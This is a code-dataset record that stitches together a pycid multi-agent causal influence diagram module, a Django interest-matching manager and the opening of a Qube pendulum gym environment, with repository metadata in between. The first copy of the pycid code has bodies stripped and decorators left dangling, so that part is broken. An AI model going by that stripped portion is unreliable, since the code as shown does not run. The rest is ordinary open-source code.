intervention: Interventions to apply. A dictionary mapping node => outcome.
"""
for variable, outcome in context.items():
if outcome not in self.get_cpds(variable).domain:
raise ValueError(f"The outcome {outcome} is not in the domain of {variable}")
intervention = intervention or {}
# Check that strategically relevant decisions have a policy specified
mech_graph = MechanismGraph(self)
for intervention_var in intervention:
for parent in self.get_parents(intervention_var):
mech_graph.remove_edge(parent, intervention_var)
for decision in self.decisions:
for query_node in query:
if mech_graph.is_dconnected(
decision + "mec", query_node, observed=list(context.keys()) + list(intervention.keys())
):
cpd = self.get_cpds(decision)
if not cpd:
raise ValueError(f"no DecisionDomain specified for {decision}")
elif isinstance(cpd, DecisionDomain):
raise ValueError(
f"P({query}|{context}, do({intervention})) depends on {decision}, but no policy imputed"
)
return super().query(query, context, intervention)
def expected_utility(
self, context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None, agent: AgentLabel = 0
) -> float:
"""Compute the expected utility of an agent for a given context and optional intervention
For example:
cid = get_minimal_cid()
out = self.expected_utility({'D':1}) #TODO: give example that uses context
Parameters
----------
context: Node values to condition upon. A dictionary mapping of node => value.
intervention: Interventions to apply. A dictionary mapping node => value.
agent: Evaluate the utility of this agent.
"""
return sum(self.expected_value(self.agent_utilities[agent], context, intervention=intervention))
def get_valid_order(self, nodes: Optional[Iterable[str]] = None) -> List[str]:
"""Get a topological order of the specified set of nodes (this may not be unique).
By default, a topological ordering of the decision nodes is given"""
if not nx.is_directed_acyclic_graph(self):
raise ValueError("A topological ordering of nodes can only be returned if the (MA)CID is acyclic")
if nodes is None:
nodes = self.decisions
else:
nodes = set(nodes)
for node in nodes:
if node not in self.nodes:
raise KeyError(f"{node} is not in the (MA)CID.")
srt = [node for node in nx.topological_sort(self) if node in nodes]
return srt
def is_s_reachable(self, d1: Union[str, Iterable[str]], d2: Union[str, Iterable[str]]) -> bool:
"""
Determine whether 'D2' is s-reachable from 'D1' (Koller and Milch, 2001)
A node D2 is s-reachable from a node D1 in a MACID M if there is some utility node U ∈ U_D1 ∩ Desc(D1)
such that if a new parent D2' were added to D2, there would be an active path in M from
D2′ to U given Pa(D)∪{D}, where a path is active in a MAID if it is active in the same graph, viewed as a BN.
"""
assert d2 in self.decisions
return self.is_r_reachable(d1, d2)
def is_r_reachable(self, decisions: Union[str, Iterable[str]], nodes: Union[str, Iterable[str]]) -> bool:
"""
Determine whether (a set of) node(s) is r-reachable from decision in the (MA)CID.
- A node 𝑉 is r-reachable from a decision 𝐷 ∈ 𝑫^𝑖 in a MAID, M = (𝑵, 𝑽, 𝑬),
if a newly added parent 𝑉ˆ of 𝑉 satisfies 𝑉ˆ ̸⊥ 𝑼^𝑖 ∩ Desc_𝐷 | Fa_𝐷 .
- If a node V is r-reachable from a decision D that means D strategically or probabilisticaly relies on V.
"""
if isinstance(decisions, str):
decisions = [decisions]
if isinstance(nodes, str):
nodes = [nodes]
mg = MechanismGraph(self)
for decision in decisions:
for node in nodes:
con_nodes = [decision] + self.get_parents(decision)
agent_utilities = self.agent_utilities[self.decision_agent[decision]]
for utility in set(agent_utilities).intersection(nx.descendants(self, decision)):
if mg.is_dconnected(node + "mec", utility, con_nodes):
return True
return False
def sufficient_recall(self, agent: Optional[AgentLabel] = None) -> bool:
"""
Returns true if the agent has sufficient recall in the (MA)CID.
Agent i in the (MA)CID has sufficient recall if the relevance graph
restricted to contain only i's decision nodes is acyclic.
If an agent is specified, sufficient recall is checked only for that agent.
Otherwise, the check is done for all agents.
"""
if agent is None:
agents: Collection = self.agents
elif agent not in self.agents:
raise ValueError(f"There is no agent {agent}, in this (MA)CID")
else:
agents = [agent]
for a in agents:
rg = RelevanceGraph(self, self.agent_decisions[a])
if not rg.is_acyclic():
return False
return True
def pure_decision_rules(self, decision: str) -> Iterator[StochasticFunctionCPD]:
"""Return a list of the decision rules available at the given decision"""
domain = self.model.domain[decision]
parents = self.get_parents(decision)
parent_cardinalities = [self.get_cardinality(parent) for parent in parents]
# We begin by representing each possible decision rule as a tuple of outcomes, with
# one element for each possible decision context
number_of_decision_contexts = int(np.product(parent_cardinalities))
functions_as_tuples = itertools.product(domain, repeat=number_of_decision_contexts)
def arg2idx(pv: Dict[str, Outcome]) -> int:
"""Convert a decision context into an index for the function list"""
idx = 0
for i, parent in enumerate(parents):
name_to_no: Dict[Outcome, int] = self.get_cpds(parent).name_to_no[parent]
idx += name_to_no[pv[parent]] * int(np.product(parent_cardinalities[:i]))
assert 0 <= idx <= number_of_decision_contexts
return idx
for func_list in functions_as_tuples:
yield StochasticFunctionCPD(decision, produce_function(), self, domain=domain)
def pure_policies(self, decision_nodes: Iterable[str]) -> Iterator[Tuple[StochasticFunctionCPD, ...]]:
"""
Iterate over all of an agent's pure policies in this subgame.
"""
possible_dec_rules = list(map(self.pure_decision_rules, decision_nodes))
return itertools.product(*possible_dec_rules)
def optimal_pure_policies(
self, decisions: Iterable[str], rel_tol: float = 1e-9
) -> List[Tuple[StochasticFunctionCPD, ...]]:
"""Find all optimal policies for a given set of decisions.
- All decisions must belong to the same agent.
- rel_tol: is the relative tolerance. It is the amount of error allowed, relative to the larger
absolute value of the two values it is comparing (the two utilities.)
"""
if not decisions:
return []
decisions = set(decisions)
try:
(agent,) = {self.decision_agent[d] for d in decisions}
except ValueError:
raise ValueError("Decisions not all from the same agent")
macid = self.copy()
for d in macid.decisions:
if (
isinstance(macid.get_cpds(d), DecisionDomain)
and not macid.is_s_reachable(decisions, d)
and d not in decisions
):
macid.impute_random_decision(d)
optimal_policies = []
max_utility = float("-inf")
for policy in macid.pure_policies(decisions):
macid.add_cpds(*policy)
expected_utility = macid.expected_utility({}, agent=agent)
if math.isclose(expected_utility, max_utility, rel_tol=rel_tol):
optimal_policies.append(policy)
elif expected_utility > max_utility:
optimal_policies = [policy]
max_utility = expected_utility
return optimal_policies
def optimal_pure_decision_rules(self, decision: str) -> List[StochasticFunctionCPD]:
"""
Return a list of all optimal pure decision rules for a given decision
"""
return [policy[0] for policy in self.optimal_pure_policies([decision])]
def impute_random_decision(self, d: str) -> None:
"""Impute a random policy to the given decision node"""
try:
domain = self.model.domain[d]
except KeyError:
raise ValueError(f"can't figure out domain for {d}, did you forget to specify DecisionDomain?")
else:
self.model[d] = StochasticFunctionCPD(
d, lambda **pv: {outcome: 1 / len(domain) for outcome in domain}, self, domain, label="random_decision"
)
def impute_fully_mixed_policy_profile(self) -> None:
"""Impute a fully mixed policy profile - ie a random decision rule to all decision nodes"""
for d in self.decisions:
self.impute_random_decision(d)
def remove_all_decision_rules(self) -> None:
"""Remove the decision rules from all decisions in the (MA)CID"""
for d in self.decisions:
self.model[d] = self.model.domain[d]
def impute_optimal_decision(self, decision: str) -> None:
"""Impute an optimal policy to the given decision node"""
# self.add_cpds(random.choice(self.optimal_pure_decision_rules(d)))
self.impute_random_decision(decision)
domain = self.model.domain[decision]
utility_nodes = self.agent_utilities[self.decision_agent[decision]]
descendant_utility_nodes = list(set(utility_nodes).intersection(nx.descendants(self, decision)))
copy = self.copy() # using a copy "freezes" the policy so it doesn't adapt to future interventions
@lru_cache(maxsize=1000)
self.add_cpds(StochasticFunctionCPD(decision, opt_policy, self, domain=domain, label="opt"))
def impute_conditional_expectation_decision(self, decision: str, y: str) -> None:
"""Imputes a policy for decision = the expectation of y conditioning on d's parents"""
# TODO: Move to analyze, as this is not really a core feature?
copy = self.copy()
@lru_cache(maxsize=1000)
self.add_cpds(**{decision: cond_exp_policy})
# Wrapper around DAG.active_trail_nodes to accept arbitrary iterables for observed.
# Really, DAG.active_trail_nodes should accept Sets, especially since it does
# inefficient membership checks on observed as a list.
def copy_without_cpds(self) -> MACIDBase:
"""copy the MACIDBase object without its CPDs"""
new = MACIDBase()
new.add_nodes_from(self.nodes)
new.add_edges_from(self.edges)
for agent in self.agents:
for decision in self.agent_decisions[agent]:
new.make_decision(decision, agent)
for utility in self.agent_utilities[agent]:
new.make_utility(utility, agent)
return new
def _get_color(self, node: str) -> Union[np.ndarray, str]:
"""
Assign a unique colour to each new agent's decision and utility nodes
"""
agents = list(self.agents)
colors = cm.rainbow(np.linspace(0, 1, len(agents)))
try:
agent = self.decision_agent[node]
except KeyError:
try:
agent = self.utility_agent[node]
except KeyError:
agent = None
if agent is not None:
color: np.ndarray = colors[[agents.index(agent)]]
return color
else:
return "lightgray" # chance node
class MechanismGraph(MACIDBase):
"""A mechanism graph has an extra parent node+"mec" for each node"""
| 41.437238 | 120 | 0.63003 | from __future__ import annotations
import itertools
import math
from functools import lru_cache
from typing import (
Any,
Callable,
Collection,
Dict,
Hashable,
Iterable,
Iterator,
KeysView,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Union,
)
from warnings import warn
import matplotlib.cm as cm
import networkx as nx
import numpy as np
from pgmpy.factors.discrete import TabularCPD
from pgmpy.inference.ExactInference import BeliefPropagation
from pycid.core.causal_bayesian_network import CausalBayesianNetwork, Relationship
from pycid.core.cpd import DecisionDomain, Outcome, StochasticFunctionCPD
from pycid.core.relevance_graph import RelevanceGraph
AgentLabel = Hashable # Could be a TypeVar instead but that might be overkill
class MACIDBase(CausalBayesianNetwork):
"""Base structure of a Multi-Agent Causal Influence Diagram.
Attributes
----------
agent_decisions: The decision nodes of each agent.
A dictionary mapping agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A dictionary mapping agent label => node labels.
decision_agent: The agent owner of each decision node.
A dictionary mapping decision node label => agent label.
utility_agent: The agent owner of each utility node.
A dictionary mapping utility node label => agent label.
"""
    class Model(CausalBayesianNetwork.Model):
        # Decision-aware specialisation of the CBN model mapping: assigning a
        # plain sequence of outcomes to a node is interpreted as that node's
        # decision domain rather than a CPD.
        def __setitem__(self, variable: str, relationship: Union[Relationship, Sequence]) -> None:
            # Warn (don't fail) when a domain-like value is assigned to a node
            # that is not registered as a decision -- likely a modelling slip.
            if isinstance(relationship, (DecisionDomain, Sequence)) and variable not in self.cbn.decisions:
                warn(f"adding DecisionDomain to non-decision node {variable}")
            super().__setitem__(variable, relationship)
        def to_tabular_cpd(self, variable: str, relationship: Union[Relationship, Sequence[Outcome]]) -> TabularCPD:
            # A bare sequence of outcomes becomes a DecisionDomain; everything
            # else is converted by the parent class.
            if isinstance(relationship, Sequence):
                return DecisionDomain(variable, self.cbn, relationship)
            else:
                return super().to_tabular_cpd(variable, relationship)
def __init__(
self,
edges: Iterable[Tuple[str, str]] = None,
agent_decisions: Mapping[AgentLabel, List[str]] = None,
agent_utilities: Mapping[AgentLabel, List[str]] = None,
**kwargs: Any,
):
"""Initialize a new MACIDBase instance.
Parameters
----------
edges: A set of directed edges. Each is a pair of node labels (tail, head).
agent_decisions: The decision nodes of each agent.
A mapping of agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A mapping of agent label => node labels.
"""
super().__init__(edges=edges, **kwargs)
self.agent_decisions = dict(agent_decisions) if agent_decisions else {}
self.agent_utilities = dict(agent_utilities) if agent_utilities else {}
self.decision_agent = {node: agent for agent, nodes in self.agent_decisions.items() for node in nodes}
self.utility_agent = {node: agent for agent, nodes in self.agent_utilities.items() for node in nodes}
    @property
    def decisions(self) -> KeysView[str]:
        """The set of all decision nodes"""
        # Live view over decision_agent: reflects later make_decision/make_chance calls.
        return self.decision_agent.keys()
    @property
    def utilities(self) -> KeysView[str]:
        """The set of all utility nodes"""
        # Live view over utility_agent: reflects later make_utility/make_chance calls.
        return self.utility_agent.keys()
    @property
    def agents(self) -> KeysView[AgentLabel]:
        """The set of all agents"""
        # NOTE: derived from agent_utilities, so an agent with decisions but no
        # utility nodes would not appear here.
        return self.agent_utilities.keys()
def make_decision(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node.
- agent specifies which agent the decision node should belong to in a MACID.
"""
self.make_chance(node)
if agent not in self.agent_decisions:
self.agent_decisions[agent] = [node]
else:
self.agent_decisions[agent].append(node)
self.decision_agent[node] = agent
def make_utility(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node."""
self.make_chance(node)
if agent not in self.agent_utilities:
self.agent_utilities[agent] = [node]
else:
self.agent_utilities[agent].append(node)
self.utility_agent[node] = agent
def make_chance(self, node: str) -> None:
"""Turn a decision node into a chance node."""
if node not in self.nodes():
raise KeyError(f"The node {node} is not in the (MA)CID")
elif node in set(self.decisions):
agent = self.decision_agent.pop(node)
self.agent_decisions[agent].remove(node)
elif node in set(self.utilities):
agent = self.utility_agent.pop(node)
self.agent_utilities[agent].remove(node)
    def add_cpds(self, *cpds: TabularCPD, **relationships: Union[Relationship, List[Outcome]]) -> None:
        # Pass-through override of CausalBayesianNetwork.add_cpds; presumably kept
        # only to widen the documented relationship types in the signature
        # (a list of outcomes = a decision domain) -- TODO confirm intent.
        super().add_cpds(*cpds, **relationships)
    def query(
        self, query: Iterable[str], context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None
    ) -> BeliefPropagation:
        """Return P(query|context, do(intervention))*P(context | do(intervention)).
        Use factor.normalize to get p(query|context, do(intervention)).
        Use context={} to get P(query).
        Parameters
        ----------
        query: A set of nodes to query.
        context: Node values to condition upon. A dictionary mapping of node => outcome.
        intervention: Interventions to apply. A dictionary mapping node => outcome.
        """
        # Validate that every conditioned-on outcome is actually in its node's domain.
        for variable, outcome in context.items():
            if outcome not in self.get_cpds(variable).domain:
                raise ValueError(f"The outcome {outcome} is not in the domain of {variable}")
        intervention = intervention or {}
        # Check that strategically relevant decisions have a policy specified
        mech_graph = MechanismGraph(self)
        # Intervened nodes no longer depend on their parents: cut those edges
        # before the d-connection test below.
        for intervention_var in intervention:
            for parent in self.get_parents(intervention_var):
                mech_graph.remove_edge(parent, intervention_var)
        for decision in self.decisions:
            for query_node in query:
                # If the decision's mechanism can influence the query given the
                # observations, the query is ill-posed unless a policy exists.
                if mech_graph.is_dconnected(
                    decision + "mec", query_node, observed=list(context.keys()) + list(intervention.keys())
                ):
                    cpd = self.get_cpds(decision)
                    if not cpd:
                        raise ValueError(f"no DecisionDomain specified for {decision}")
                    elif isinstance(cpd, DecisionDomain):
                        # A bare DecisionDomain means no decision rule was imputed.
                        raise ValueError(
                            f"P({query}|{context}, do({intervention})) depends on {decision}, but no policy imputed"
                        )
        return super().query(query, context, intervention)
def expected_utility(
self, context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None, agent: AgentLabel = 0
) -> float:
"""Compute the expected utility of an agent for a given context and optional intervention
For example:
cid = get_minimal_cid()
out = self.expected_utility({'D':1}) #TODO: give example that uses context
Parameters
----------
context: Node values to condition upon. A dictionary mapping of node => value.
intervention: Interventions to apply. A dictionary mapping node => value.
agent: Evaluate the utility of this agent.
"""
return sum(self.expected_value(self.agent_utilities[agent], context, intervention=intervention))
def get_valid_order(self, nodes: Optional[Iterable[str]] = None) -> List[str]:
"""Get a topological order of the specified set of nodes (this may not be unique).
By default, a topological ordering of the decision nodes is given"""
if not nx.is_directed_acyclic_graph(self):
raise ValueError("A topological ordering of nodes can only be returned if the (MA)CID is acyclic")
if nodes is None:
nodes = self.decisions
else:
nodes = set(nodes)
for node in nodes:
if node not in self.nodes:
raise KeyError(f"{node} is not in the (MA)CID.")
srt = [node for node in nx.topological_sort(self) if node in nodes]
return srt
def is_s_reachable(self, d1: Union[str, Iterable[str]], d2: Union[str, Iterable[str]]) -> bool:
"""
Determine whether 'D2' is s-reachable from 'D1' (Koller and Milch, 2001)
A node D2 is s-reachable from a node D1 in a MACID M if there is some utility node U ∈ U_D1 ∩ Desc(D1)
such that if a new parent D2' were added to D2, there would be an active path in M from
D2′ to U given Pa(D)∪{D}, where a path is active in a MAID if it is active in the same graph, viewed as a BN.
"""
assert d2 in self.decisions
return self.is_r_reachable(d1, d2)
    def is_r_reachable(self, decisions: Union[str, Iterable[str]], nodes: Union[str, Iterable[str]]) -> bool:
        """
        Determine whether (a set of) node(s) is r-reachable from decision in the (MA)CID.
        - A node 𝑉 is r-reachable from a decision 𝐷 ∈ 𝑫^𝑖 in a MAID, M = (𝑵, 𝑽, 𝑬),
        if a newly added parent 𝑉ˆ of 𝑉 satisfies 𝑉ˆ ̸⊥ 𝑼^𝑖 ∩ Desc_𝐷 | Fa_𝐷 .
        - If a node V is r-reachable from a decision D that means D strategically or probabilisticaly relies on V.
        """
        # Normalise both arguments to lists of node labels.
        if isinstance(decisions, str):
            decisions = [decisions]
        if isinstance(nodes, str):
            nodes = [nodes]
        # The "newly added parent Vhat" is modelled by the node's mechanism
        # parent (node + "mec") in the mechanism graph.
        mg = MechanismGraph(self)
        for decision in decisions:
            for node in nodes:
                # Condition on Fa_D = the decision plus its parents.
                con_nodes = [decision] + self.get_parents(decision)
                agent_utilities = self.agent_utilities[self.decision_agent[decision]]
                # Only utilities of D's agent that are descendants of D matter.
                for utility in set(agent_utilities).intersection(nx.descendants(self, decision)):
                    if mg.is_dconnected(node + "mec", utility, con_nodes):
                        return True
        return False
def sufficient_recall(self, agent: Optional[AgentLabel] = None) -> bool:
"""
Returns true if the agent has sufficient recall in the (MA)CID.
Agent i in the (MA)CID has sufficient recall if the relevance graph
restricted to contain only i's decision nodes is acyclic.
If an agent is specified, sufficient recall is checked only for that agent.
Otherwise, the check is done for all agents.
"""
if agent is None:
agents: Collection = self.agents
elif agent not in self.agents:
raise ValueError(f"There is no agent {agent}, in this (MA)CID")
else:
agents = [agent]
for a in agents:
rg = RelevanceGraph(self, self.agent_decisions[a])
if not rg.is_acyclic():
return False
return True
def pure_decision_rules(self, decision: str) -> Iterator[StochasticFunctionCPD]:
"""Return a list of the decision rules available at the given decision"""
domain = self.model.domain[decision]
parents = self.get_parents(decision)
parent_cardinalities = [self.get_cardinality(parent) for parent in parents]
# We begin by representing each possible decision rule as a tuple of outcomes, with
# one element for each possible decision context
number_of_decision_contexts = int(np.product(parent_cardinalities))
functions_as_tuples = itertools.product(domain, repeat=number_of_decision_contexts)
def arg2idx(pv: Dict[str, Outcome]) -> int:
"""Convert a decision context into an index for the function list"""
idx = 0
for i, parent in enumerate(parents):
name_to_no: Dict[Outcome, int] = self.get_cpds(parent).name_to_no[parent]
idx += name_to_no[pv[parent]] * int(np.product(parent_cardinalities[:i]))
assert 0 <= idx <= number_of_decision_contexts
return idx
for func_list in functions_as_tuples:
def produce_function(early_eval_func_list: tuple = func_list) -> Callable:
# using a default argument is a trick to get func_list to evaluate early
return lambda **parent_values: early_eval_func_list[arg2idx(parent_values)]
yield StochasticFunctionCPD(decision, produce_function(), self, domain=domain)
def pure_policies(self, decision_nodes: Iterable[str]) -> Iterator[Tuple[StochasticFunctionCPD, ...]]:
"""
Iterate over all of an agent's pure policies in this subgame.
"""
possible_dec_rules = list(map(self.pure_decision_rules, decision_nodes))
return itertools.product(*possible_dec_rules)
    def optimal_pure_policies(
        self, decisions: Iterable[str], rel_tol: float = 1e-9
    ) -> List[Tuple[StochasticFunctionCPD, ...]]:
        """Find all optimal policies for a given set of decisions.
        - All decisions must belong to the same agent.
        - rel_tol: is the relative tolerance. It is the amount of error allowed, relative to the larger
        absolute value of the two values it is comparing (the two utilities.)
        """
        if not decisions:
            return []
        decisions = set(decisions)
        # All given decisions must have the same owner; the 1-tuple unpacking
        # raises ValueError when the set of owners has size != 1.
        try:
            (agent,) = {self.decision_agent[d] for d in decisions}
        except ValueError:
            raise ValueError("Decisions not all from the same agent")
        # Work on a copy so imputed rules don't leak back into self.
        macid = self.copy()
        # Decisions that are not strategically relevant to this subgame get a
        # random rule so the expected-utility query below is well-defined.
        for d in macid.decisions:
            if (
                isinstance(macid.get_cpds(d), DecisionDomain)
                and not macid.is_s_reachable(decisions, d)
                and d not in decisions
            ):
                macid.impute_random_decision(d)
        optimal_policies = []
        max_utility = float("-inf")
        # Exhaustive search: evaluate every pure policy, keeping all policies
        # whose utility is within rel_tol of the best seen so far.
        for policy in macid.pure_policies(decisions):
            macid.add_cpds(*policy)
            expected_utility = macid.expected_utility({}, agent=agent)
            if math.isclose(expected_utility, max_utility, rel_tol=rel_tol):
                optimal_policies.append(policy)
            elif expected_utility > max_utility:
                optimal_policies = [policy]
                max_utility = expected_utility
        return optimal_policies
def optimal_pure_decision_rules(self, decision: str) -> List[StochasticFunctionCPD]:
"""
Return a list of all optimal pure decision rules for a given decision
"""
return [policy[0] for policy in self.optimal_pure_policies([decision])]
def impute_random_decision(self, d: str) -> None:
"""Impute a random policy to the given decision node"""
try:
domain = self.model.domain[d]
except KeyError:
raise ValueError(f"can't figure out domain for {d}, did you forget to specify DecisionDomain?")
else:
self.model[d] = StochasticFunctionCPD(
d, lambda **pv: {outcome: 1 / len(domain) for outcome in domain}, self, domain, label="random_decision"
)
def impute_fully_mixed_policy_profile(self) -> None:
"""Impute a fully mixed policy profile - ie a random decision rule to all decision nodes"""
for d in self.decisions:
self.impute_random_decision(d)
def remove_all_decision_rules(self) -> None:
"""Remove the decision rules from all decisions in the (MA)CID"""
for d in self.decisions:
self.model[d] = self.model.domain[d]
    def impute_optimal_decision(self, decision: str) -> None:
        """Impute an optimal policy to the given decision node"""
        # self.add_cpds(random.choice(self.optimal_pure_decision_rules(d)))
        # Start with a random rule so the copied model below is fully specified.
        self.impute_random_decision(decision)
        domain = self.model.domain[decision]
        utility_nodes = self.agent_utilities[self.decision_agent[decision]]
        # Only utilities downstream of the decision can be affected by it.
        descendant_utility_nodes = list(set(utility_nodes).intersection(nx.descendants(self, decision)))
        copy = self.copy()  # using a copy "freezes" the policy so it doesn't adapt to future interventions
        @lru_cache(maxsize=1000)
        def opt_policy(**parent_values: Outcome) -> Outcome:
            # Greedy one-step optimisation: evaluate each candidate outcome in
            # this decision context and pick the utility-maximising one.
            eu = {}
            for d in domain:
                parent_values[decision] = d
                eu[d] = sum(copy.expected_value(descendant_utility_nodes, parent_values))
            return max(eu, key=eu.get)  # type: ignore
        self.add_cpds(StochasticFunctionCPD(decision, opt_policy, self, domain=domain, label="opt"))
    def impute_conditional_expectation_decision(self, decision: str, y: str) -> None:
        """Imputes a policy for decision = the expectation of y conditioning on d's parents"""
        # TODO: Move to analyze, as this is not really a core feature?
        # Freeze the current model so the policy doesn't track later changes.
        copy = self.copy()
        @lru_cache(maxsize=1000)
        def cond_exp_policy(**pv: Outcome) -> float:
            # If y itself is observed in the decision context, return it directly.
            if y in pv:
                return pv[y]  # type: ignore
            else:
                return copy.expected_value([y], pv)[0]
        self.add_cpds(**{decision: cond_exp_policy})
# Wrapper around DAG.active_trail_nodes to accept arbitrary iterables for observed.
# Really, DAG.active_trail_nodes should accept Sets, especially since it does
# inefficient membership checks on observed as a list.
def active_trail_nodes(
self, variables: Union[str, List[str], Tuple[str, ...]], observed: Optional[Iterable[str]] = None, **kwargs: Any
) -> Dict[str, Set[str]]:
return super().active_trail_nodes(variables, list(observed), **kwargs) # type: ignore
def copy_without_cpds(self) -> MACIDBase:
"""copy the MACIDBase object without its CPDs"""
new = MACIDBase()
new.add_nodes_from(self.nodes)
new.add_edges_from(self.edges)
for agent in self.agents:
for decision in self.agent_decisions[agent]:
new.make_decision(decision, agent)
for utility in self.agent_utilities[agent]:
new.make_utility(utility, agent)
return new
def _get_color(self, node: str) -> Union[np.ndarray, str]:
"""
Assign a unique colour to each new agent's decision and utility nodes
"""
agents = list(self.agents)
colors = cm.rainbow(np.linspace(0, 1, len(agents)))
try:
agent = self.decision_agent[node]
except KeyError:
try:
agent = self.utility_agent[node]
except KeyError:
agent = None
if agent is not None:
color: np.ndarray = colors[[agents.index(agent)]]
return color
else:
return "lightgray" # chance node
def _get_shape(self, node: str) -> str:
if node in self.decisions:
return "s"
elif node in self.utilities:
return "D"
else:
return "o"
class MechanismGraph(MACIDBase):
    """A mechanism graph has an extra parent node+"mec" for each node"""

    def __init__(self, cid: MACIDBase):
        """Build the mechanism graph of `cid` by adding a mechanism parent to every node."""
        super().__init__(
            edges=cid.edges(),
            agent_decisions=cid.agent_decisions,
            agent_utilities=cid.agent_utilities,
        )
        for node in cid.nodes:
            # Fix: the original tested node[:-3] (everything EXCEPT the last three
            # characters); the intent is to reject names already ending in "mec".
            if node.endswith("mec"):
                # Fix: the original message lacked the f-prefix, so "{node}" was
                # printed literally instead of the offending node's name.
                raise ValueError(f"can't create a mechanism graph when node {node} already ends with mec")
            self.add_node(node + "mec")
            self.add_edge(node + "mec", node)
        # TODO: adapt the parameterization from cid as well
| 2,324 | 20 | 290 |
9383b5407c491e2906f208dceed512e4e2254eca | 3,150 | py | Python | backEnd/interestsProfile/views.py | arnavn101/Coterie | b4478f0e3cc799ce40f95a3711e0cdf18809a3e4 | [
"MIT"
] | null | null | null | backEnd/interestsProfile/views.py | arnavn101/Coterie | b4478f0e3cc799ce40f95a3711e0cdf18809a3e4 | [
"MIT"
] | null | null | null | backEnd/interestsProfile/views.py | arnavn101/Coterie | b4478f0e3cc799ce40f95a3711e0cdf18809a3e4 | [
"MIT"
] | 1 | 2021-11-07T12:57:53.000Z | 2021-11-07T12:57:53.000Z | from authUser.models import CustomAccount
from interestsProfile.models import InterestProfile, AlgoIDToUserID
from interestsProfile.matching_algo import MatchingAlgo
from profileUser.interests_list import length
| 47.014925 | 99 | 0.727937 | from authUser.models import CustomAccount
from interestsProfile.models import InterestProfile, AlgoIDToUserID
from interestsProfile.matching_algo import MatchingAlgo
from profileUser.interests_list import length
class InterestProfileManager:
    """Manage one user's interest weights and keep the matching index in sync.

    Wraps the ``InterestProfile`` row belonging to a ``CustomAccount`` and
    pushes weight vectors into ``MatchingAlgo`` whenever weights change.
    """

    def __init__(self, user_object: CustomAccount):
        # Fetch (or lazily create) the InterestProfile row for this user.
        self.user_object = user_object
        self.user_interests_profile, _ = InterestProfile.objects.get_or_create(user_id=user_object)

    def initialize_interests(self, list_user_interests):
        """Set weight 1 for each known interest and register this user's
        weight vector with the matching index.

        Returns False if any requested interest is unknown (the known ones
        are still applied), True otherwise.
        """
        success = True
        for individual_interest in list_user_interests:
            if individual_interest not in self.user_interests_profile.dict_interests_weights:
                # Unknown interest: report failure but keep processing the rest.
                success = False
                continue
            self.user_interests_profile.dict_interests_weights[individual_interest] = 1
        self.user_interests_profile.save(update_fields=['dict_interests_weights'])
        algo = MatchingAlgo(length)
        algo.add_vector_workflow(list(self.user_interests_profile.dict_interests_weights.values()))
        # Remember which matching-index slot belongs to this user.
        record = AlgoIDToUserID.objects.get_or_create()[0]
        record.mapping[algo.length()-1] = self.user_object.id
        record.save()
        return success

    def update_interests(self, new_list_interests):
        """Replace the user's interest set: dropped interests are zeroed,
        brand-new (weight 0) interests are set to 1, and the matching
        index is rebuilt. Returns False if any new interest is unknown.
        """
        list_current_interests = set(self.user_interests_profile.dict_interests_weights.keys())
        new_interests = set(new_list_interests)
        # Interests that are no longer selected get their weight reset to 0.
        to_reset = list(list_current_interests.difference(new_interests))
        success = True
        for individual_key in to_reset:
            self.user_interests_profile.dict_interests_weights[individual_key] = 0
        for individual_interest in new_list_interests:
            if individual_interest not in self.user_interests_profile.dict_interests_weights:
                success = False
                continue
            currentVal = self.user_interests_profile.dict_interests_weights[individual_interest]
            if currentVal == 0:
                # Only bump interests starting from 0; nonzero (learned)
                # weights are preserved.
                self.user_interests_profile.dict_interests_weights[individual_interest] = 1
        self.user_interests_profile.save(update_fields=['dict_interests_weights'])
        self.rebuild_algo()
        return success

    def increase_interest(self, interest_input, increment_amt):
        """Raise one interest's weight by ``increment_amt`` and rebuild the index."""
        self.user_interests_profile.dict_interests_weights[interest_input] += increment_amt
        self.user_interests_profile.save(update_fields=['dict_interests_weights'])
        self.rebuild_algo()

    def decrease_interest(self, interest_input, decrement_amt):
        """Lower one interest's weight by ``decrement_amt`` and rebuild the index."""
        self.user_interests_profile.dict_interests_weights[interest_input] -= decrement_amt
        self.user_interests_profile.save(update_fields=['dict_interests_weights'])
        self.rebuild_algo()

    def rebuild_algo(self):
        """Rebuild the matching index from every InterestProfile in the DB."""
        all_interest_profiles = InterestProfile.objects.all()
        algo = MatchingAlgo(length)
        record = AlgoIDToUserID.objects.get()
        # Start the slot->id mapping from scratch for the rebuilt index.
        record.mapping = {}
        for i_profile in all_interest_profiles:
            # NOTE(review): initialize_interests uses add_vector_workflow and
            # maps the slot to self.user_object.id, while this loop uses
            # add_vector and maps to i_profile.id -- confirm the asymmetry
            # is intentional.
            algo.add_vector(list(i_profile.dict_interests_weights.values()))
            record.mapping[algo.length()-1] = i_profile.id
        record.save()
        algo.serialize_index()
| 2,745 | 8 | 184 |
803f5959d4df3a3d844d51a6d88f8fc784c9b598 | 3,738 | py | Python | gym_brt/envs/qube_swingup_env.py | bjoseru/quanser-openai-driver | 1fcac7289bbeb140ae034f661b86d405f027f262 | [
"MIT"
] | 10 | 2018-08-02T20:01:13.000Z | 2021-09-07T18:09:20.000Z | gym_brt/envs/qube_swingup_env.py | bjoseru/quanser-openai-driver | 1fcac7289bbeb140ae034f661b86d405f027f262 | [
"MIT"
] | 4 | 2019-05-20T18:38:34.000Z | 2022-01-24T19:49:42.000Z | gym_brt/envs/qube_swingup_env.py | bjoseru/quanser-openai-driver | 1fcac7289bbeb140ae034f661b86d405f027f262 | [
"MIT"
] | 12 | 2019-04-09T03:56:50.000Z | 2022-02-02T19:01:31.000Z | from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import numpy as np
from gym import spaces
from gym_brt.envs.qube_base_env import QubeBaseEnv
"""
Description:
A pendulum is attached to an un-actuated joint to a horizontal arm,
which is actuated by a rotary motor. The pendulum begins
downwards and the goal is flip the pendulum up and then to keep it from
falling by applying a voltage on the motor which causes a torque on the
horizontal arm.
Source:
This is modified for the Quanser Qube Servo2-USB from the Cart Pole
problem described by Barto, Sutton, and Anderson, and implemented in
OpenAI Gym: https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py
This description is also modified from the description by the OpenAI
team.
Observation:
